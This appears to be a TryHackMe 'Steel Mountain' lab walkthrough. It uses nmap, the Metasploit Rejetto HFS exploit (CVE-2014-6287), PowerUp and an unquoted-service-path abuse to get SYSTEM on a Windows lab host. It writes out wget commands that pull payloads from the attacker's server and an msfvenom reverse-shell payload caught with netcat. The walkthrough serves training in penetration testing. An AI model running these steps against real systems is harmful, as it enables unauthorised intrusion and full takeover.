Initial Reconnaissance
Scanning the Target with Nmap Scan
nmap -Pn -A -p- -T4 10.112.172.119
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ssl/ms-wbt-server?
|_ssl-date: 2026-04-18T14:24:30+00:00; 0s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8080/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49199/tcp open msrpc Microsoft Windows RPC
49200/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=4/18%OT=80%CT=1%CU=37411%PV=Y%DS=1%DC=T%G=Y%TM=69E3945
OS:A%P=x86_64-pc-linux-gnu)SEQ(SP=108%GCD=1%ISR=105%TI=I%CI=I%II=I%SS=S%TS=
OS:7)OPS(O1=M2301NW8ST11%O2=M2301NW8ST11%O3=M2301NW8NNT11%O4=M2301NW8ST11%O
OS:5=M2301NW8ST11%O6=M2301ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%
OS:W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M2301NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%
OS:S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=
OS:Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R
OS:%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=
OS:80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0
OS:%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R
OS:=Y%DFI=N%T=80%CD=Z)
Network Distance: 1 hop
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: STEELMOUNTAIN, NetBIOS user: <unknown>, NetBIOS MAC: 02:0d:ee:c2:15:03 (unknown)
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2026-04-18T14:24:25
|_ start_date: 2026-04-18T13:59:08
TRACEROUTE (using port 111/tcp)
HOP RTT ADDRESS
1 0.75 ms 10.112.172.119Web Enumeration
Port 80 (IIS):
Browsing to http://10.112.172.119 reveals a company website with only static images. Directory enumeration yields no promising results
Port 8080 (Rejetto HFS):
Browsing to http://10.112.172.119:8080 presents the Rejetto HFS web interface — a lightweight file-sharing server.
Initial Foothold — Exploiting Rejetto HFS
The most reliable method for initial access is using Metasploit's dedicated exploit module
msfconsole
search HttpFileServer 2.3
found that the Rejetto HTTP File Server version 2.3 is vulnerable to CVE-2014–6287, a remote code execution vulnerability that allows unauthenticated attackers to execute arbitrary commands on the target system
Configure the exploit
use exploit/windows/http/rejetto_hfs_exec
show options
set RHOSTS 10.112.172.119
set RPORT 8080
set TARGETURI http://10.112.172.119:8080/
exploit
Capturing the User Flag
c:\user\bill\Desktop\User.txt
Privilege Escalation
Enumeration with PowerUp
Download the powerUp on my local machine
python3 -m http.server 1234
Upload to the victim machine
load powershell
powershell_shell
wget http://10.112.102.243:1234/PowerUp.ps1 -OutFile PowerUp.ps1
#Alternative Way#
#from Meterpreter Session#
Upload /root/PowerUp.ps1
#Alternative way#
shell
powershell wget http://10.112.102.243:1234/PowerUp.ps1 -OutFile PowerUp.ps1
Import-Module .\PowerUp.ps1
Invoke-AllChecks
From the results, I noticed an unquoted service path. The Unquoted Service Path vulnerability occurs when a Windows service path contains spaces and is not enclosed in quotes. In such cases, Windows interprets each space-separated segment as a potential executable path.
Exploiting the Unquoted Service Path
1- Create a reverse shell payload with msfvenom on the local Machine
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.112.102.243 LPORT=4443 -f exe-service -o shell.exe
python3 -m http.server 12342- Transfer the payload to the victim
#on the Powershell session#
wget http://10.112.102.243:1234/shell.exe -OutFile shell.exe
3- move the shell to this path"C:\Program Files (x86)\IObit"
#back to Meterpreter Session#
Ctrl+z
#open shell#
shell
copy c:\Users\bill\Desktop\shell.exe "C:\Program Files (x86)\IObit\Advanced.exe"
4- Start a Netcat listener
nc -lvnp 44435- stop the service and start it again
net stop AdvancedSystemCareService9
net start AdvancedSystemCareService9
6- Receive the reverse shell
The listener captures a connection with SYSTEM privileges
Capturing the Root Flag
C:\Users\Administrator\Desktop
powershell cat root.txt
Finally, thank you very much for reading to the end. I hope you found this article interesting.
Room Link : https://tryhackme.com/room/steelmountain
TryHackMe: https://tryhackme.com/p/AbdallahSamir
LinkedIn: Abdallah Samir | LinkedIn
X(Twitter): https://x.com/abdalla_jr7